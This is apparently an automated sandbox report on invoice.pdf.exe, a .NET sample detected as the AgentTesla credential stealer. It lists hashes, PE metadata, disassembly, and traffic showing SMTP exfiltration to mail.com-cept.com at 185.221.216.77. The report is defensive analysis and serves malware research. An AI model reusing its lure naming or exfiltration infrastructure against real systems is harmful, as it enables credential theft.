Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.1% (good quality ratio 0.1%) Quality average: 65% Quality standard deviation: 0%
HCA Information:	Successful, ratio: 99% Number of executed functions: 270 Number of non-executed functions: 11
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 92.122.145.220, 104.43.193.48, 168.61.161.212, 23.218.208.56, 51.11.168.160, 2.20.142.210, 2.20.142.209, 51.103.5.159, 92.122.213.194, 92.122.213.247, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:45:40	API Interceptor	999x Sleep call for process: invoice.pdf.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.221.216.77	invoice copys.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mail.com-cept.com	invoice copys.exe	Get hash	malicious	Browse	185.221.216.77

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOST4GEEKS-LLCUS	synchronossTicket#513473.htm	Get hash	malicious	Browse	185.221.216.34
	invoice copys.exe	Get hash	malicious	Browse	185.221.216.77
	55-2912.doc	Get hash	malicious	Browse	66.85.46.76
	DAT_G_0259067.doc	Get hash	malicious	Browse	66.85.46.76
	DAT_G_0259067.doc	Get hash	malicious	Browse	66.85.46.76
	5349 TED_04235524.doc	Get hash	malicious	Browse	66.85.46.76
	5349 TED_04235524.doc	Get hash	malicious	Browse	66.85.46.76
	FILE_122020_VVY_591928.doc	Get hash	malicious	Browse	66.85.46.76
	Archivo_29_48214503.doc	Get hash	malicious	Browse	66.85.46.76
	Adjunto 29 886_473411.doc	Get hash	malicious	Browse	66.85.46.76
	Informacion_29.doc	Get hash	malicious	Browse	66.85.46.76
	Informacion_29.doc	Get hash	malicious	Browse	66.85.46.76
	Informacion_122020_EUH-4262717.doc	Get hash	malicious	Browse	66.85.46.76
	1923620_YY-5094713.doc	Get hash	malicious	Browse	66.85.46.76
	Doc 2912 75513.doc	Get hash	malicious	Browse	66.85.46.76
	DAT.doc	Get hash	malicious	Browse	66.85.46.76
	ARCHIVOFile_762-36284.doc	Get hash	malicious	Browse	66.85.46.76
	4640-2912-122020.doc	Get hash	malicious	Browse	66.85.46.76
	MENSAJE_29_2020.doc	Get hash	malicious	Browse	66.85.46.76
	MENSAJE_29_2020.doc	Get hash	malicious	Browse	66.85.46.76

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\invoice.pdf.exe.log Download File
Process:	C:\Users\user\Desktop\invoice.pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	664
Entropy (8bit):	5.288448637977022
Encrypted:	false
SSDEEP:	12:Q3LaJU20NaL10Ug+9Yz9t0U29hJ5g1B0U2ukyrFk70U2xANlW3ANv:MLF20NaL3z2p29hJ5g522rW2xAi3A9
MD5:	B1DB55991C3DA14E35249AEA1BC357CA
SHA1:	0DD2D91198FDEF296441B12F1A906669B279700C
SHA-256:	34D3E48321D5010AD2BD1F3F0B728077E4F5A7F70D66FA36B57E5209580B6BDC
SHA-512:	BE38A31888C9C2F8047FA9C99672CB985179D325107514B7500DDA9523AE3E1D20B45EACC4E6C8A5D096360D0FBB98A120E63F38FFE324DF8A0559F6890CC801
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\35774dc3cd31b4550ab06c3354cf4ba5\System.Runtime.Remoting.ni.dll",0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.588265788010279
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	invoice.pdf.exe
File size:	486912
MD5:	d3bb643f07aee4cc6be3d303222bd2c9
SHA1:	a5804c4525cb33a8eb1a4c534e9da3824a826980
SHA256:	4e49cd4c9abc7a87bd4da347a31454701ab005bf1f9d9295b9f16de4353f56dc
SHA512:	6fe8c0d2471df4ee732299628dedfaf575501cd8cb2efa1a1ad2ab5e6dafa1e9941fd8da1359f2b9de7481406cd33d9e4172df55ecf6b585ee9580b2ee74b693
SSDEEP:	12288:XH5M2ZZvHLaMoOsT8XvgynR2yLc5GOqhiyI3N4Y:Xq2Z5uMcT8/pnLc585WN4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....6`..............P..d..........f.... ........@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x478266
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6036D2FE [Wed Feb 24 22:28:14 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v2.0.50727
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x78214	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7a000	0x5dc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7626c	0x76400	False	0.812343089323	data	7.60133626951	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x7a000	0x5dc	0x600	False	0.43359375	data	4.22610011924	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7c000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x7a090	0x34c	data
RT_MANIFEST	0x7a3ec	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2016 - 2021
Assembly Version	1.0.0.0
InternalName	TRACEQUERYINFOCLASS.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	ASM PS
ProductVersion	1.0.0.0
FileDescription	ASM PS
OriginalFilename	TRACEQUERYINFOCLASS.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2021 07:47:11.041878939 CET	49748	587	192.168.2.7	185.221.216.77
Feb 25, 2021 07:47:11.099550009 CET	587	49748	185.221.216.77	192.168.2.7
Feb 25, 2021 07:47:11.099716902 CET	49748	587	192.168.2.7	185.221.216.77
Feb 25, 2021 07:47:11.234230995 CET	587	49748	185.221.216.77	192.168.2.7
Feb 25, 2021 07:47:11.238316059 CET	49748	587	192.168.2.7	185.221.216.77
Feb 25, 2021 07:47:11.298199892 CET	587	49748	185.221.216.77	192.168.2.7
Feb 25, 2021 07:47:11.299180031 CET	49748	587	192.168.2.7	185.221.216.77
Feb 25, 2021 07:47:11.360979080 CET	587	49748	185.221.216.77	192.168.2.7
Feb 25, 2021 07:47:11.401804924 CET	49748	587	192.168.2.7	185.221.216.77
Feb 25, 2021 07:47:11.406331062 CET	49748	587	192.168.2.7	185.221.216.77
Feb 25, 2021 07:47:11.472676039 CET	587	49748	185.221.216.77	192.168.2.7
Feb 25, 2021 07:47:11.472706079 CET	587	49748	185.221.216.77	192.168.2.7
Feb 25, 2021 07:47:11.472729921 CET	587	49748	185.221.216.77	192.168.2.7
Feb 25, 2021 07:47:11.472743988 CET	587	49748	185.221.216.77	192.168.2.7
Feb 25, 2021 07:47:11.472771883 CET	49748	587	192.168.2.7	185.221.216.77
Feb 25, 2021 07:47:11.472800970 CET	49748	587	192.168.2.7	185.221.216.77
Feb 25, 2021 07:47:11.475091934 CET	587	49748	185.221.216.77	192.168.2.7
Feb 25, 2021 07:47:11.483385086 CET	49748	587	192.168.2.7	185.221.216.77
Feb 25, 2021 07:47:11.542651892 CET	587	49748	185.221.216.77	192.168.2.7
Feb 25, 2021 07:47:11.545597076 CET	49748	587	192.168.2.7	185.221.216.77

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2021 07:45:29.929872990 CET	53	53775	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:30.501810074 CET	51837	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:30.563373089 CET	53	51837	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:30.723601103 CET	55411	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:30.772183895 CET	53	55411	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:40.010601997 CET	63668	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:40.067771912 CET	53	63668	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:41.132278919 CET	54640	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:41.181118011 CET	53	54640	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:42.356674910 CET	58739	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:42.405380964 CET	53	58739	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:43.438487053 CET	60338	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:43.487229109 CET	53	60338	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:45.449098110 CET	58717	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:45.500652075 CET	53	58717	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:46.362993956 CET	59762	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:46.413685083 CET	53	59762	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:47.211992979 CET	54329	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:47.260826111 CET	53	54329	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:48.251665115 CET	58052	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:48.310827971 CET	53	58052	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:49.282202005 CET	54008	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:49.340861082 CET	53	54008	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:50.463219881 CET	59451	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:50.513267040 CET	53	59451	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:51.425451994 CET	52914	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:51.477083921 CET	53	52914	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:52.942915916 CET	64569	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:52.994226933 CET	53	64569	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:53.908653021 CET	52816	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:53.969897032 CET	53	52816	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:55.346628904 CET	50781	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:55.395332098 CET	53	50781	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:56.127955914 CET	54230	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:56.176606894 CET	53	54230	8.8.8.8	192.168.2.7
Feb 25, 2021 07:45:59.285716057 CET	54911	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:45:59.334491014 CET	53	54911	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:00.237407923 CET	49958	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:00.288676023 CET	53	49958	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:01.296257973 CET	50860	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:01.351079941 CET	53	50860	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:02.185996056 CET	50452	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:02.234764099 CET	53	50452	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:07.447736979 CET	59730	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:07.498127937 CET	53	59730	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:25.939229012 CET	59310	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:25.998996019 CET	53	59310	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:26.659382105 CET	51919	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:26.708070993 CET	53	51919	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:30.758517981 CET	64296	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:30.816822052 CET	53	64296	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:33.473304033 CET	56680	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:33.524985075 CET	53	56680	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:34.088426113 CET	58820	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:34.145903111 CET	53	58820	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:34.824124098 CET	60983	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:34.872814894 CET	53	60983	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:35.417375088 CET	49247	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:35.474327087 CET	53	49247	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:35.961294889 CET	52286	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:36.012943983 CET	53	52286	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:36.638849974 CET	56064	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:36.669473886 CET	63744	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:36.698359013 CET	53	56064	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:36.737001896 CET	53	63744	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:37.587342978 CET	61457	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:37.649615049 CET	53	61457	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:38.487600088 CET	58367	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:38.524760962 CET	60599	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:38.547660112 CET	53	58367	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:38.585912943 CET	53	60599	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:39.448039055 CET	59571	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:39.509650946 CET	53	59571	8.8.8.8	192.168.2.7
Feb 25, 2021 07:46:40.122548103 CET	52689	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:46:40.171725988 CET	53	52689	8.8.8.8	192.168.2.7
Feb 25, 2021 07:47:10.945453882 CET	50290	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:47:11.021434069 CET	53	50290	8.8.8.8	192.168.2.7
Feb 25, 2021 07:47:11.447138071 CET	60427	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:47:11.496120930 CET	53	60427	8.8.8.8	192.168.2.7
Feb 25, 2021 07:47:13.363775015 CET	56209	53	192.168.2.7	8.8.8.8
Feb 25, 2021 07:47:13.433437109 CET	53	56209	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 25, 2021 07:47:10.945453882 CET	192.168.2.7	8.8.8.8	0x68aa	Standard query (0)	mail.com-cept.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 25, 2021 07:47:11.021434069 CET	8.8.8.8	192.168.2.7	0x68aa	No error (0)	mail.com-cept.com		185.221.216.77	A (IP address)	IN (0x0001)

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Feb 25, 2021 07:47:11.234230995 CET	587	49748	185.221.216.77	192.168.2.7	220-uksrv3.websiteserverbox.com ESMTP Exim 4.93 #2 Thu, 25 Feb 2021 01:47:10 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 25, 2021 07:47:11.238316059 CET	49748	587	192.168.2.7	185.221.216.77	EHLO 724536
Feb 25, 2021 07:47:11.298199892 CET	587	49748	185.221.216.77	192.168.2.7	250-uksrv3.websiteserverbox.com Hello 724536 [84.17.52.78] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Feb 25, 2021 07:47:11.299180031 CET	49748	587	192.168.2.7	185.221.216.77	STARTTLS
Feb 25, 2021 07:47:11.360979080 CET	587	49748	185.221.216.77	192.168.2.7	220 TLS go ahead

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: invoice.pdf.exe PID: 6496 Parent PID: 5760

General

Start time:	07:45:37
Start date:	25/02/2021
Path:	C:\Users\user\Desktop\invoice.pdf.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\invoice.pdf.exe'
Imagebase:	0xb0000
File size:	486912 bytes
MD5 hash:	D3BB643F07AEE4CC6BE3D303222BD2C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.241020858.0000000003701000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.240792649.0000000002701000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: invoice.pdf.exe PID: 6580 Parent PID: 6496

General

Start time:	07:45:41
Start date:	25/02/2021
Path:	C:\Users\user\Desktop\invoice.pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\invoice.pdf.exe
Imagebase:	0xf80000
File size:	486912 bytes
MD5 hash:	D3BB643F07AEE4CC6BE3D303222BD2C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.506799805.00000000036A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.508855968.0000000003B2E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.501365134.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: invoice.pdf.exe PID: 6496 Parent PID: 5760 invoice.pdf.exeCOMMON

Executed Functions

Function 048E1AE0, Relevance: 17.1, Strings: 13, Instructions: 897COMMON

Download Yara Rule

Strings

_, xrefs: 048E2825
F, xrefs: 048E260A
N, xrefs: 048E28BD
U, xrefs: 048E235D
&, xrefs: 048E2776
\, xrefs: 048E1D9E
t, xrefs: 048E1FB7
?, xrefs: 048E212C
=, xrefs: 048E250C
., xrefs: 048E1F0A
h, xrefs: 048E24D8
m, xrefs: 048E247D
-, xrefs: 048E1E2F

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID: &$-$.$=$?$F$N$U$\$_$h$m$t
API String ID: 0-2137078230
Opcode ID: fbf4ab2ecbc23845a37b0929c6c04ada269259ee21c60ad15552a2e4d577db9a
Instruction ID: acc86373350d2479e92bfb1a3f4f50ccd438c6eaae92bc954f02b78a8eb14978
Opcode Fuzzy Hash: fbf4ab2ecbc23845a37b0929c6c04ada269259ee21c60ad15552a2e4d577db9a
Instruction Fuzzy Hash: 13820471C05268CEEB28CFA2C9187EDFAB8BB46349F1495D9C109B7291D7780AC8DF14

Uniqueness

Uniqueness Score: -1.00%

Function 048E1AD1, Relevance: 15.5, Strings: 12, Instructions: 486COMMON

Download Yara Rule

Strings

,, xrefs: 048E2721
!, xrefs: 048E244D
F, xrefs: 048E260A
7, xrefs: 048E2817
X, xrefs: 048E2884
o, xrefs: 048E1D6B
D, xrefs: 048E2108
Y, xrefs: 048E2316
G, xrefs: 048E1EC1
[, xrefs: 048E1E0B
=, xrefs: 048E250C
K, xrefs: 048E24A5

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID: !$,$7$=$D$F$G$K$X$Y$[$o
API String ID: 0-3673748993
Opcode ID: 043f11459b88a35a2bb7c5c562df5e4374e2c3aa36fea4e11e42f3ae6973a382
Instruction ID: 28dea46ba9a34c1e0d37b95bd995e3a907336215601ef8741ec5825661a96924
Opcode Fuzzy Hash: 043f11459b88a35a2bb7c5c562df5e4374e2c3aa36fea4e11e42f3ae6973a382
Instruction Fuzzy Hash: 1722F871D05268CEEB28CFA6C9583EDFAB9BB46349F1485D9C149B7291D7780AC8DF00

Uniqueness

Uniqueness Score: -1.00%

Function 048EB0A9, Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08335fc28149d758868ca167bbaa3abb4204dd6e76bf5536a6c31d28d8357b9f
Instruction ID: a5baaafe48b7ec3c7121cf85215b82a3471d892d7921289a4e05d8ca02b389e2
Opcode Fuzzy Hash: 08335fc28149d758868ca167bbaa3abb4204dd6e76bf5536a6c31d28d8357b9f
Instruction Fuzzy Hash: 4591E470E00248CFDB04DFAAD5846ADBBF2BF4A324F248A69D414EB399D734A941CF55

Uniqueness

Uniqueness Score: -1.00%

Function 048E4890, Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58947c26334710988c2c35d31f3afa3e1d58b8f6b01bb94a8aa9a8c1a79335eb
Instruction ID: b658d552af83eb2d3426f98da3592511f43107af6beb432e225bc5b379a6df53
Opcode Fuzzy Hash: 58947c26334710988c2c35d31f3afa3e1d58b8f6b01bb94a8aa9a8c1a79335eb
Instruction Fuzzy Hash: FB611871D001088FCB04DFAAD5846ADBBF2BF89324F64C665D928F73A9D630A941CB65

Uniqueness

Uniqueness Score: -1.00%

Function 048E4688, Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.243478938.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5b9cc1f493930333014f1ea351079b1c91c4ba2fe65aaa249824cfdf3471cd
